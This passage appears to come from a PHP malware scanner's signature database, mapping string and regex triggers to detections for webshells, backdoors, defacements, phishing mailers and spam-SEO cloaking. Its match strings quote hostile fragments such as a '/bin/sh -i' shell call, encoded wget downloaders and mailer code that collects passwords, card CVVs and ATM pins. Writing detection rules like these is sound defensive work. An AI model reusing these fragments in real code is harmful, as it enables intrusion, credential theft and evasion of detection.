	'system($cmd . \' 1>/dev/null 2>/dev/null\', $code);' => array(STR_CLEARFILE,'php.hacktool.generic.001', NULL),
	'grep -oP \'(?<=ESTABLISHED )([0-9]+)\'|head -1`;wget' => array(STR_CLEARFILE, 'php.backdoor.system.008', NULL),
	'<?php print \'! -_-" Permissions Changed' => array(STR_CLEARFILE, 'php.backdoor.chmod.001', NULL),
	'php-findsock-shell - A Findsock Shell' => array(STR_CLEARFILE, 'php.hacktool.generic.013', NULL),
	'= base64_decode("d2dldCBodHRw' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.uploader.057', '\\$[\\w]+[\\s]*=[\\s]*base64_decode\\("d2dldCBodHRw[^;]+;[\\s]*system.\\$[\\w]+.;'),
	'system(\'/bin/sh -i\');' => array(STR_CLEARFILE, 'pl.backdoor.reverse_shell.001', NULL),
	'$_SERVER["REQUEST_URI"] = str_replace("?reboot=yes", "", $_SERVER[' => array(STR_CLEARFILE, 'php.malware.cryptominer.009', NULL),
	'char payload[' => array(STR_CLEARFILE, 'py.backdoor.shell.002', NULL),
	'@system(base64_decode(\'a2lsbGFsbCAtOSA=\').basename(base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.system.001.001', NULL),
	'@touch("_input_1_.php.", $mtime, $mtime);' => array(STR_CLEARFILE, 'php.backdoor.gf_backdoor_installer.001', NULL),
),

'ck' => array(STR_TRIGGER,

	'Hack' => array(STR_TRIGGER,
		'#   Script: Cpanel + FTP Cracker              |' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.008', NULL),
		'BOZKURT TIM' => array(STR_CLEARFILE, 'php.defaced.bozkurttim.001', NULL),
		'<code>MY FRIENDS' => array(STR_CLEARFILE, 'html.defaced.generic.110', NULL),
		'<title>Xai Syndicate' => array(STR_CLEARFILE, 'html.defaced.generic.111', NULL),
		'GeNErAL' => array(STR_CLEARFILE, 'html.defaced.GeNErAL.001', NULL),
		'From : Hell' => array(STR_CLEARFILE, 'html.defaced.shgaaoi.001', NULL), 
		'+++An Indian Hacker' => array(STR_CLEARFILE,'html.defaced.generic.070', NULL),
		'WE ARE DEFACER INDONESIA' => array(STR_CLEARFILE, 'html.defaced.indonesia.006', NULL),
		'<title>GHOSTSEC-TEAM |' => array(STR_CLEARFILE, 'html.defaced.ghostsec_team.001', NULL),
		'var msg  = "This Website Hacked By' => array(STR_CLEARFILE, 'html.defaced.generic.031', NULL),
		';echo Hacked by' => array(STR_CLEARFILE, 'php.defaced.script.003', NULL),
		'fwrite($x,"Hacked By J4r");' => array(STR_CLEARFILE, 'php.defaced.script.006', NULL),
		'EMEGE SAYGIN OLSUN BIRAZ' => array(STR_CLEARFILE, 'html.defaced.generic.044', NULL),
		'var text=\"./H4CK3D' => array(STR_CLEARFILE, 'js.defaced.script.005', NULL),
		'messages[0] = "You Has Been Hacked!!"' => array(STR_CLEARFILE,'js.defaced.script.012', NULL),
		'Hacked by G_OUULL' => array(STR_CLEARFILE, 'html.defaced.generic.128', NULL),
		'Hacked by l0c4lh34rtz' => array(STR_CLEARFILE, 'php.hacktool.massdeface.003', NULL),
		'Hacked By bajatax' => array(STR_CLEARFILE, 'php.defaced.script.012', NULL),
		'Hacked%20By%20OoS' => array(STR_CLEAR_MULTIMATCH, 'js.defaced.script.017', '<script>\s*(?:<!--\s*)?document\.write\s*\(\s*unescape\s*\(\s*.{1,50}Hacked%20By%20OoS[^>]+?>\s*<\/script>'),
		'By - MrJoker</title>' => array(STR_CLEARFILE, 'php.hacktool.deface_checker.002', NULL),
		'pwnd by' => array(STR_CLEARFILE, 'html.defaced.generic.160', NULL),
		'H!tl3r007' => array(STR_CLEARFILE, 'html.defaced.BFA.001.001',NULL),
		'>[#] Achan Dot ID' => array(STR_CLEARFILE, 'html.defaced.AchanDotID.001', NULL),
		'<link rel="shortcut icon" href="http://error-404.ucoz.com/bghh.jpg" type="image/x-icon"' => array(STR_CLEARFILE, 'html.defaced.BGHH.001', NULL),
		'>Bangladesh Cyber Army' => array(STR_CLEARFILE, 'html.defaced.generic.059', NULL),
		'message[22] = "Albalooshi";' => array(STR_CLEARFILE, 'html.defaced.muslim_army.001', NULL),
		'<TITLE>./pwned</TITLE>' => array(STR_CLEARFILE, 'html.defaced.generic.022', NULL),
		'Created By arage' => array(STR_CLEARFILE, 'pl.hacktool.flooder.005', NULL),
		'<meta name="keywords" content="kmq@hotmail.com kna@hotmail.com' => array(STR_CLEARFILE, 'html.defaced.generic.026', NULL),
		'Ip Lookup Reverse Domain by' => array(STR_CLEARFILE, 'php.hacktool.generic.003', NULL),
		'%22Hacked%20By%20' => array(STR_CLEARFILE, 'html.defaced.generic.020', NULL),
		'JO Hack3r' => array(STR_CLEARFILE, 'php.backdoor.uploader.153', NULL),
		'[+] We Hack This Site To Inform About' => array(STR_CLEARFILE, 'html.defaced.generic.025', NULL),
		'TeamHack SQL DUMPER' => array(STR_CLEARFILE, 'php.hacktool.sql_TeamHack.001', NULL),
	),

	'hack' => array(STR_TRIGGER,
		'Deadrz_404' => array(STR_CLEARFILE, 'html.defaced.generic.132', NULL),
		'<h1>In The Name Of Allah</h1>' => array(STR_CLEARFILE, 'html.defaced.JOK3R.002', NULL),
		'<title>PwnZ by' => array(STR_CLEARFILE, 'html.defaced.generic.112', NULL),
		'Jagad Dot ID' => array(STR_CLEARFILE, 'html.defaced.DotID.001', NULL),
		'<title>hacked by hector' => array(STR_CLEARFILE, 'html.defaced.generic.152', NULL),
		'only mail, n1cedre4m[at]yahoo[dot]com' => array(STR_CLEARFILE, 'html.defaced.Hmei7.001', NULL),
		'curl_init ("http://www.zone-h.org/' => array(STR_CLEARFILE, 'php.defaced.script.013', NULL),
		'www.turkhackteam' => array(STR_CLEARFILE, 'html.defaced.TurkHackTeam.001', NULL),
		'hacker by .moncef' => array(STR_CLEARFILE, 'html.defaced.generic.115', NULL),
	),

	'Black Sniper' => array(STR_TRIGGER,
		'$exec=exec("' => array(STR_CLEARFILE, 'php.hacktool.black_sniper_exec.001', NULL),
		'} Drupal Mass Exploiter' => array(STR_CLEARFILE, 'py.hacktool.drupal_toolkit.001', NULL),
		'$crypt_now=$_GET[' => array(STR_CLEARFILE, 'php.hacktool.black_sniper_md5.001', NULL),
		'curl_init("http://zone-h.org/notify/single' => array(STR_CLEARFILE, 'php.hacktool.black_sniper_zone_h.001', NULL),
	),

	'[Hh][Aa4][Cc][Kk]' => array(REX_TRIGGER,
		'Hacked by Andreas Rehm' => array(STR_WHITE,
			'Hacked by Lance Rushing' => array(STR_WHITE,
				'hacked by kudo to' => array(STR_WHITE,
					'hacked by Marco Cimmino' => array(STR_WHITE,
						'Coppermine Photo Gallery' => array(STR_WHITE,
							'New York Times hacked' => array(STR_WHITE,
								'### Hacked by SDIC: M17n,' => array(STR_WHITE,
									'(^|\n).{0,50}[Hh][Aa4][Cc][Kk][Ee3][Dd][\s_][Bb][Yy][\s_]' => array(REX_CLEARFILE, 'rex.defaced.generic.010', NULL),
								),
							),
						),
					),
				),
			),
		),
	),

	'ST4RHUN7ER' => array(STR_CLEARFILE, 'php.defaced.generic.011', NULL),
	'require "phishtank_check.php"' => array(STR_CLEARFILE, 'php.phishing.generic.059', NULL),
	'PD9waHAgY3JlYXRlX2Z1bmN0aW9uKCcnLCBiYXNlNjRfZG' => array(STR_CLEARFILE, 'php.backdoor.dgreusdi.002', NULL),
),

'ahoo' => array(STR_TRIGGER,

	'google' => array(STR_TRIGGER,

		'if(stristr($agent,\'google\') || stristr($agent,\'bing\') || stristr($agent,\'yahoo\') || stristr($agent,\'aol\')) {' => array(STR_TRIGGER,
			'  echo \'' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_cloaking.001', '<\?php\s*\$agent=._SERVER..HTTP_USER_AGENT..;\s*if.stristr..agent,.google.. \|\|[^\{]+\{\s*echo \'\s*<p>[^\}]+?<.p>\';\s*\}\s*\?>'),
		),

		'abuse|amazonaws|anonym' => array(STR_TRIGGER,
			'strtolower($_SERVER[\'REMOTE_ADDR\']))){ exit();' => array(STR_CLEARFILE, 'php.malware.UA_check.009', NULL),
		),

		'if(strpos($s_http_user_agent, "googlebot") !== false|| strpos($s_http_user_agent, "yahoo") !== false||' => array(STR_TRIGGER,
			'echo @file_get_contents("http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.129', '<.php\s*\$base_url=.http[^<>\{]+if.strpos..s_http_user_agent, .googlebot.. \!== false\|\|[^\{<>]+?\{\s*echo \@file_get_contents..http:[^\)]+\);\s*\}\s*\?>'),
		),

		'if (preg_match("/zh-c/i", $lang)==false||preg_match' => array(STR_TRIGGER,
			'echo "<script type=\'text/javascript\' src=\'http' => array(STR_CLEARFILE, 'php.spam-seo.chinese_spam.001', NULL),
		),

		'if(isset($emails)&&$count>=1)' => array(STR_TRIGGER,
			'<input type="submit" value="$_$Click Here$_$"' => array(STR_CLEARFILE, 'php.phishing.script.007', NULL),
		),

		'header("Location:' => array(STR_TRIGGER,
			'foreach(explode(\'|\', $words) as $word) {' => array(STR_CLEARFILE, 'php.spam-seo.redirect.138', NULL),
		),

		'$tpl_path = \'/wp-admin/includes/template.html\';' => array(STR_CLEARFILE, 'php.spam-seo.class-wp-text.002', NULL),
		'proud ofOmar5200 has much to be proud ofOmar5200' => array(STR_CLEARFILE, 'php.spam-seo.iho.001', NULL),
		'deny from virustotal.com' => array(STR_CLEARFILE, 'htaccess.phishing.block_bots.003', NULL),
		'>Slackercode eMail Extractor</' => array(STR_CLEARFILE, 'php.hacktool.slackercode_email_extractor.001', NULL),
		'if(preg_match($botchar, $ua))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.088', '(\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_ACCEPT_LANGUAGE.\];[\s]*)?error_reporting.0.;[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP[^;]+;[^}]+botchar[^}]+}[\s]*if\(stripos\([^}]+exit;[\s]*\}'),
		'(strpos($value[\'target\'], \'google\')  !== false || strpos($value[\'target\'], \'GOOGLE\')) {' => array(STR_CLEARFILE, 'php.phishing.script.015', NULL),
		'RewriteRule.\..\w+\-\w+\.php' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.injector.046', 'RewriteEngine On[\s]*(RewriteBase[^\n]*[\s]*)?(RewriteCond %\{HTTP_[^\n]+google[^\n]+[\s]*)+(RewriteCond %\{HTTP_HOST[^\n]+[\s]*)?RewriteRule[^\[]+\.php[^\[]*[\s]*\[[^\n\]]+\]'),
	),

	'If instr(zhizhu,"google")>0 Or instr(zhizhu,"yahoo")>0' => array(STR_TRIGGER, 
		'let_301 = getHTTPPage(Replace("http' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.002', NULL),
		'htmls = getHTTPPage("' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.002.04', NULL),
		'response.write jumpcode' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.redirect.002.03', '<%[\\s]*On Error Resume Next[\\s]*jumpcodes=\"http[^\"]+\"[\\s]*jumpcodes=\"<script type=\"[^@]+response.write jumpcode[\\s]*%>'),
	),

	'_my_images = curl_get($' => array(STR_TRIGGER,
		'_query = urlencode(trim($_GET["type"]));' => array(STR_TRIGGER,
			'_useragent, \'yahoo\')!==false || strpos($' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.011', NULL),
		),
	),

	'$bot = true;' => array(STR_TRIGGER,
		'if ($body && isset($body[\'data\'])) $data = urldecode($body[\'data\']);' => array(STR_TRIGGER,
			'"&ip=$user_ip&version=$version";' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.158','function get_data_[\\w]+\\(\\)[\\s]*{[\\s]*.data = ..;[\\s]*.version = [^;]+;[\\s]*.bot = false;[\\s]*.user_ip[^>]+if[\\s]*..body && isset..body..data......data = urldecode..body..data...;[^;]+return .data;[\\s]*}'),
		),
	),

	'fwrite($in, $code);' => array(STR_TRIGGER,
		'strpos( preg_replace( $user_agent_to_filter,' => array(STR_TRIGGER,
			'$in = fopen("wp-content/themes/$dir/header.php", "a");' => array(STR_CLEARFILE, 'php.spam-seo.infector.006', NULL),
		),
	),

	'<script>var regexp=/\.(aol|google' => array(STR_TRIGGER,
		'biso)(\.[a-z0-9\-]+){1,2}\//ig;' => array(STR_TRIGGER,
			'window.location.href="' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.025', '<script>[\\s]*var[\\s]*regexp=...\\(aol.google.[^;]+ig;[\\s]*var[\\s]*where[\\s]*=[\\s]*document.referrer;[\\s]*if[\\s]*\\([\\s]*regexp\\.[^}]+\\(where\\)\\)[\\s]*\\{[\\s]*window.location.href[\\s]*=[\\s]*[^}]+\\}[\\s]*<.script>'),
		),
	),

	'echo "if(s.indexOf(\'bing\')>0||s.indexOf(\'aol\')>0||s.indexOf(\'google' => array(STR_TRIGGER,
		'echo "self.location=\'https://www.google.com' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.036', 'echo "<script>[\\s]*";[\\s]*echo "var s=document.referrer;[\\s]*";[\\s]*echo "if.s.indexOf..bing[^:]+echo "self.location=.https:..www.google.com[^<]+echo "<.script>[\\s]*";'),
	),

	'if(preg_match("/googlebot/i",' => array(STR_TRIGGER,
		'if(strpos($l,\'beginlink:\')!==false)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.150', 'function [\\w]+\\(\\) \\{[\\s]*\\$[\\w]+[\\s]*=[\\s]*\\$_SERVER..HTTP_USER_AGENT..;[\\s]*if.preg_match.".googlebot.i",[^>]+function [\\w]+\\(\\$[\\w]+,\\$[\\w]+=\\\'\\\'\\) \\{[^>]+if.strpos.\\$[\\w]+,.beginlink:.\\)!==false[^>]+>[^}]+exit;[\\s]*}[\\s]*}'),
	),

	'ses=split("google,bing' => array(STR_TRIGGER,
		'response.write("<!DOCTYPE html><html><body><script>document.location=("""&DataCenterURL' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.007', NULL),
	),

	'self.location =' => array(STR_TRIGGER,
		'indexOf("google") > 0 || s.indexOf("bing"' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.037', '(echo[\s]*\'[\s]*)?(<script[\s]*>[\s]*)?var[\s]*[\w]+[\s]*=[\s]*document.referrer;[\s]*if[\s]*\([\w]+\.indexOf..google[^{]+\{[\s]*self.location[\s]*=[\s]*.?[\'"][^;]+;[\s]*}([\s]*<[\s]*.script[\s]*>[\s]*)?(\'[\s]*;)?'), //modified by PG to cover variants // removed 'http' by JM to cover variants
	),

	'foreach ($search_engines as $some_bots) {' => array(STR_TRIGGER,
		'"\${1} \n". $links, $data, 1 );' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.171', 'public function [\w]+\(\$data\)[^\}]+\$links[^_]+search_engines[^}]+1\}[^\*]+\*body[^;]+\);[\s]*if[\s]*\(isset\(\$_REQUEST[^\}]+return \$data;[\s]*\}'),
	),

	'$_POST["upd"])) $client->update_client();' => array(STR_TRIGGER,
		'echo $client->getContent();' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.066', NULL),
	),

	'_decrypt\'][\'?' => array(STR_TRIGGER,
		'??\']=base64_decode' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.024', NULL),
	),

	'function check_cookie($url_redirect)' => array(STR_TRIGGER,
		'check_cookie($another_mobile_redirect);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.042', NULL),
	),

	'<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.redirect.004','<cfset REQUEST.UserAgent = LCase\\( CGI.http_user_agent \\) .>[\\s]*<cfif .Find. "google[^>]+>[\\s]*<cfhttp[^>]+>[\\s]*<cfoutput>[^>]+>[\\s]*<cfabort .>[\\s]*<.cfif>'),
	'"User-Agent: Mozilla/5.0 aol yahoo(compatible; Googlebot/2.1; +http://www.google.com/bot.html)",' => array(STR_CLEARFILE, 'php.spam-seo.injector.081', NULL),
	'Header(\'Location: http://bit.ly' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.035', 'if.preg_match..!google.yahoo.bing[^;]+Header..Location: http:..bit.ly[^;]+.\\);'),
	'key3.id = key2.object_id AND key3.post_content LIKE \'%torrent%\'");' => array(STR_CLEARFILE, 'php.spam-seo.injector.056', NULL),
	'} else if ($cloackedPage) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.079', NULL),
	'eto spisok ip' => array(STR_CLEARFILE, 'php.redirect.header_location.016', NULL),
	'Parasite.php?",$nhhtml);}' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.028', NULL),
	'$neirongx = file_get_contents($wangzhang.\'site_map.php?&pages=\'.$aa.' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.031', NULL),
	'file_put_contents($this->docRoot.\'/\' . $this->subFolder.\'/\' . $hash . \'.txt\', $template);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.032', NULL),
	'<meta content="Yahoo!' => array(STR_CLEARFILE, 'html.phishing.yahoo.001', NULL),
	'IDBI LOGZ' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.001', NULL),
	'Owned YAHOO ID' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.003', NULL),
	'$yahoopassword = $_POST[\'yahoopassword' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.004', NULL),
	'Yahoo! Mail: The best web-based email!' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.005', NULL),
	'$_POST[\'yahoopassword' => array(STR_CLEARFILE, 'php.phishing.yahoo.001', NULL),
	'<b>Yahoo Alert!</b><br><br>Dear <br><br>Since you changed' => array(STR_CLEARFILE, 'html.phishing.yahoo.002', NULL),
	'class="cssSignupText">Don\'t have a Hotmail account?' => array(STR_CLEARFILE, 'html.phishing.hotmail.003', NULL),
	'{manytext_bing}' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.026', NULL),
),

'$message' => array(STR_TRIGGER,

	'\$message[\s]*\.?=[\s]*[\'"][\s]*[-+=*!@#~_.\|\[\]><]{3,}[\s]*[-+=*!@#~_.><\w]{2,}' => array(REX_TRIGGER,

		'public function' => array(STR_TRIGGER,
			'$email = trim(Tools::getValue(\'email\'));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.028', '\$passwd[\s]*=[\s]*trim\(Tools::getValue\(.passwd.\)\);[\s]*\$email[^;]+\);[\s]*\$message[^\}]+break;[\s\}]+(\$message[^;]+;[\s]*Tools::file_get_contents[^;]+\);[\s]*mail\([^;]+\);)?'),
		),

		
		'\$message[\s]*\.?=[\s]*[^;]+\$_(POST|GET|SERVER)\[[^;]+;[^\x02]+[\s@]mail\([^;]+\$message[^;]*\);' => array(REX_CLEARFILE, 'php.phishing.mailer.134', NULL),
		'require_once(\'block_detectors.php\');' => array(STR_CLEARFILE, 'php.phishing.generic.061', NULL),
		'substr(strrchr($username, "@"), 1);' => array(STR_CLEARFILE, 'php.hacktool.mailer.136', NULL),
	),

	'session_start();' => array(STR_TRIGGER,
		'$message .=' => array(STR_TRIGGER,

			'Location:' => array(STR_TRIGGER,
				'gethostbyaddr' => array(STR_TRIGGER,
					'$message .= "-------' => array(STR_CLEARFILE, 'php.phishing.mailer.089', NULL),
				),
			),

			'if(getenv(HTTP_CLIENT_IP))' => array(STR_TRIGGER,
				'$ip=getenv(HTTP_CLIENT_IP);' => array(STR_CLEARFILE, 'php.phishing.script.003', NULL),
			),
		),
	),

	'------------\n";' => array(STR_TRIGGER,

		'$message .= "-----' => array(STR_TRIGGER,
			'$_POST[\'password\']."\n";' => array(STR_CLEARFILE, 'php.phishing.mailer.117', NULL),
		),

		': ".$_POST[\'credit' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer-cc-stealer.001', '\$\w+\s*=\s*getenv\(.REMOTE_ADDR.\);\s*(\$\w+)\s*\.=..-----[^;]+;\s*\1\s*\.=\s*.[^:]+:\s*.\.\$_POST\[[^;]+;\s*\1\s*\.=\s*.\w+[^:]+:\s*.\.\$_POST[^-]+-[^;]+;\s*\1[^-]+-[^;]+;\s*[^\]]+\].;\s*\$\w+[^;]+;\s*mail\(.\w+\@\w+\.\w+.,[^\)]+\);'),
	),

	'$message = stripslashes ( $_POST [\'mes\'] )' => array(STR_TRIGGER,
		'header ( "Location: http://{$link}" );' => array(STR_CLEARFILE, 'php.mailer.redirect.001', NULL),
		'$message = stripslashes ( $_POST [\'mes\'] );' => array(STR_CLEARFILE, 'php.mailer.POST.004.04', NULL, 1),
	),

	'$mailSMTP = new SendMailSmtpClass($LOGIN, $PASSWORD, $SERVER, $NAME, $PORT);' => array(STR_TRIGGER,
		'$TEXT = $_POST[' => array(STR_TRIGGER,
			'echo "[good:".$resA[$a]."]";' => array(STR_CLEARFILE, 'php.hacktool.mailer.047', NULL),
		),
	),

	'ocation' => array(STR_TRIGGER,
		'getenv(' => array(STR_TRIGGER,
			'$message .= "Pass' => array(STR_CLEARFILE, 'php.hacktool.mailer.016', NULL),
		),
	),
	
	'wfHash(ABSPATH . $file)) > 1 && strlen($shac = strtoupper($hash' => array(STR_TRIGGER,
		'method_exists("wordfenceHash", "wfHash") && count($hash = @wordfenceHash:' => array(STR_CLEAR_MULTIMATCH, 'php.malware.component.008', 'foreach \(array\("core" => array\([^)]+\),[\s]*"plugins" => array[^{]+\{[\s]*foreach \(\$files as \$file\)[\s]*{[\s]*if[\s]*\(method_exists\("wordfenceHash",[\s]*"wfHash"\) && count\(\$hash = @wordfenceHash::[\s]*wfHash\(ABSPATH[^}]+}[\s]*else[^}]+\}[\s}]+'),
	),

	'message)?(Randomizer::randomizeWithCells($message' => array(STR_CLEARFILE, 'php.mailer.POST.001', NULL),
	'$message .= "-------tHANKs tO Dhapi' => array(STR_CLEARFILE, 'php.mailer.POST.009', NULL),
	'$message .= "p@sswd: ".$_' => array(STR_CLEARFILE, 'php.mailer.POST.004.05', NULL,1),
	'$message .="CVV' => array(STR_CLEARFILE, 'php.mailer.POST.004.07', NULL),
	'$message .= "+-------- ? [ SUB X' => array(STR_CLEARFILE, 'php.mailer.POST.004.08', NULL),
	'$message  = "------------------+ Yahoo Login ReZulT' => array(STR_CLEARFILE, 'php.mailer.POST.016', NULL),
	'$message .= "----------------- Spammed By JezzyWire --------------\n";' => array(STR_CLEARFILE, 'php.hacktool.mailer-Jezzy.001', NULL),
	'$message .= "---------JEZZY TRADING---------\n";' => array(STR_CLEARFILE, 'php.hacktool.mailer-Jezzy.002', NULL),
	'$message  = "---------------+ Alibobo ReZulT +--------------\n"' => array(STR_CLEARFILE, 'php.hacktool.mailer-Jezzy.003', NULL),
	'$message .= "-------------Bron-------------\n";' => array(STR_CLEARFILE, 'php.phishing.mailer.055', NULL),
	'$message .="Pass' => array(STR_CLEARFILE, 'php.hacktool.mailer.016.02', NULL),
	'$message .= "password:' => array(STR_CLEARFILE, 'php.hacktool.mailer.017', NULL),
	'$message .= " - by x0r -\n";' => array(STR_CLEARFILE, 'php.mailer.POST.022', NULL),
	'$message .= "---------------Created By YMCMB' => array(STR_CLEARFILE, 'php.hacktool.mailer.019', NULL),
	'$message .= "--------------+ Aol ReZulT' => array(STR_CLEARFILE, 'php.hacktool.mailer.024', NULL),
	'$message .= "-----------------------Deta!ls' => array(STR_CLEARFILE, 'php.hacktool.mailer.025', NULL),
	'$message .= "username: ".$_POST[\'email\']."\n";' => array(STR_CLEARFILE, 'php.mailer.POST.023', NULL),
	'$message .= "---------------|BY NoBODY|' => array(STR_CLEARFILE, 'php.hacktool.mailer.051', NULL),
	'$message2=shell_exec("sh inst");' => array(STR_CLEARFILE, 'php.exploit.sysinfo.003', NULL),
	'$message .= "ATM Pin: ".' => array(STR_CLEARFILE, 'html.phishing.chase.001.004', NULL),
	'$message .= "Atm pin' => array(STR_CLEARFILE, 'php.phishing.generic.004',NULL),
	'$message  = "+=========================+ login Spam Rezult' => array(STR_CLEARFILE, 'php.phishing.mailer.032', NULL),
	'$message  = "+=========================+ Credit Card Info' => array(STR_CLEARFILE, 'php.phishing.generic.010', NULL),
	'$message = "Good day Fire Lord' => array(STR_CLEARFILE, 'php.phishing.generic.012', NULL),
	'$message .= "-------------------| DR-YASSINE' => array(STR_CLEARFILE,'php.mailer.POST.024', NULL),
	'$message .= "---------------Created By' => array(STR_CLEARFILE,'php.mailer.POST.026', NULL),
	'$message .= "|----------| MR' => array(STR_CLEARFILE,'php.mailer.POST.029', NULL),
	'$message .= "-------------------| By redouane' => array(STR_CLEARFILE,'php.mailer.POST.030', NULL),
	'$message .= \'Exp M: \';' => array(STR_CLEARFILE, 'php.hacktool.mailer.034', NULL),
	'$message .= "************* Fuck' => array(STR_CLEARFILE,'php.hacktool.mailer.037', NULL),
	'Mail_LoadFromFile(\'./from_domains.txt\', $g_aFromDomains);' => array(STR_CLEARFILE, 'php.hacktool.mailer.018', NULL),
	'$sent = "xxx"."sent!";' => array(STR_CLEARFILE,'php.hacktool.mailer.030', NULL),
	'goplanet($vlad,$putin,$header,$to);' => array(STR_CLEARFILE, 'php.mailer.generic.025', NULL),
	'$entry_line = "$ip | UA: $agent | \r\n";' => array(STR_CLEARFILE, 'php.hacktool.mailer.095', NULL),
	'ocation: https://acrobat.adobe.com/' => array(STR_CLEARFILE, 'html.phishing.adobe.006', NULL),
	'"|-----------' => array(STR_CLEARFILE, 'php.hacktool.mailer.154', NULL),
),

'fwrit' => array(STR_TRIGGER,

	'pass' => array(STR_TRIGGER,

		'echo "site = $url[0]\n";' => array(STR_TRIGGER,
			'preg_match(\'/(.+?);(.+?);(.+?);(.+?);(.*)/\', $buffer, $config);' => array(STR_TRIGGER,
				'a:1:{s:13:\"administrator\";s:1:\"1\";}")' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.019', NULL),
			),
		),

		'if ($_COOKIE[\'user\'] != $user || $_COOKIE[\'pass\'] != $pass)' => array(STR_TRIGGER,
			'."<title>$sitetitle :: $title</title>' => array(STR_CLEARFILE, 'php.backdoor.webshell.086', NULL),
		),

		'if($password==""||$filename==""||$body=="")' => array(STR_TRIGGER,
			'echo "publish success & uploaded"' => array(STR_CLEARFILE, 'php.backdoor.uploader.047', NULL),
		),

		'$action!="publish"' => array(STR_TRIGGER,
			'if($action==""||$password==""||$filename==""||$body=="")' => array(STR_CLEARFILE, 'php.backdoor.article_publish.001', NULL),
		),

		'$password=' => array(STR_TRIGGER,
			'if(fwrite($fo,$_POST' => array(STR_CLEARFILE, 'php.backdoor.neirong.001', NULL),
		),

		'if($_POST[$value]==' => array(STR_TRIGGER,
			'window.location' => array(STR_CLEARFILE, 'php.phishing.mailer.107', NULL),
		),

		'\x68\x65\x78\x64\x65\x63' => array(STR_TRIGGER,
			'\x73\x74\x72\x6c\x65\x6e"($' => array(STR_CLEARFILE, 'php.malware.obfuscated.053', NULL),
		),

		'create_file($glob_pathMW' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.backdoor_mw.001', '(\/\/Create a new SimplePieCache object\s*)?error_reporting.0.;\s*if .isset.._POST..passwordMW.\]\).+?_error_hash".\$postwue;\s*\}(\s*\/\/Include the system functions)?'),
		'INSERT INTO `".$prefix."admin_user` (`firstname`, `lastname`,`email`,`username`,`password`' => array(STR_CLEARFILE, 'php.backdoor.magento-login.003.02', NULL),
	),

	'$_SERVER[\'DOCUMENT_ROOT\']' => array(STR_TRIGGER,

		'$text' => array(STR_TRIGGER,
			'http_' => array(STR_TRIGGER,

				'disable_functions=none' => array(STR_TRIGGER,
					'$ini(\'php.ini\', \'w\');' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.037', NULL),
				),

				'fopen($check' => array(STR_CLEARFILE, 'php.backdoor.uploader_group.001', NULL),
				'echo\s*\'\s*(?:<item>)?\s*<title>\s*<\s*\!\[CDATA\[[^\]]+\]\s*\]\s*>\s*<\/title>' => array(REX_CLEARFILE, 'php.spam-seo.injector.256', NULL),
			),
		),

		'function createFolder($path)' => array(STR_TRIGGER,
			'function gethttpcnt($url,$username' => array(STR_CLEARFILE, 'php.backdoor.uploader.290', NULL),
			'$body=$_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.uploader.377', NULL),
		),
	),

	'echo' => array(STR_TRIGGER,

		'\x7' => array(STR_TRIGGER,
			'function http_get($url)' => array(STR_CLEARFILE, 'php.backdoor.uploader.277', NULL),
		),

		'addslashes(cleanstring(sXOR(hextostr($_POST' => array(STR_TRIGGER,
			'mysql_fetch_row($botcheck);' => array(STR_CLEARFILE, 'php.hacktool.botnet_CC.002', NULL),
		),

		'preg_match_all(' => array(STR_TRIGGER,
			'if(stristr(__DIR__,"plugins")){' => array(STR_CLEARFILE, 'php.backdoor.uploader.351', NULL),

			'curl_exec($' => array(STR_TRIGGER,
				'WHMCS/.htaccess' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.023', NULL),
			),
		),

		'fopen(\'/home/\'.$user.\'/.cpanel/contactinfo\', \'w\');' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.021', NULL),
		'.":" . $_SERVER[\'REQUEST_URI\'] . "->NoCity->NoState' => array(STR_CLEARFILE, 'php.malware.redirect.038', NULL),
		'fwrite($fh,"$rec: $ip#$host#$browser\r\n");' => array(STR_CLEARFILE, 'php.spam-seo.redirect.136', NULL),
		'unlink("/home/".$cur_dir[2]."/.cpanel/contactinfo");' => array(STR_CLEARFILE, 'php.malware.component.021', NULL),
		'echo (\'<FORM method="GET"><INPUT type="text" name="filename" value="runlib.php"><INPUT type="submit" value="Make and go"></FORM>\');' => array(STR_CLEARFILE, 'php.backdoor.injector.138', NULL),
	),

